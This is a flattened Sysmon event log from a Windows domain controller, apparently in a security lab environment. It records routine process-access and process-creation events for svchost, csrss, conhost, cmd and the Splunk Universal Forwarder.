13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B600-00000000A301}2820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE3-6005-B600-00000000A301}2820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.652{59A5CD1D-8EE3-6005-B600-00000000A301}2820C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B500-00000000A301}2836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.623{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.623{59A5CD1D-8EE3-6005-B300-00000000A301}648812C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B400-00000000A301}872C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.623{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B400-00000000A301}872C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8EE3-6005-B200-00000000A301}41921756C:\Windows\system32\cmd.exe{59A5CD1D-8EE3-6005-B400-00000000A301}872C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.617{59A5CD1D-8EE3-6005-B400-00000000A301}872C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8EE3-6005-B200-00000000A301}4192C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000003604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.326{59A5CD1D-8EE3-6005-B300-00000000A301}648812C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B200-00000000A301}4192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.326{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B300-00000000A301}648C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.311{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 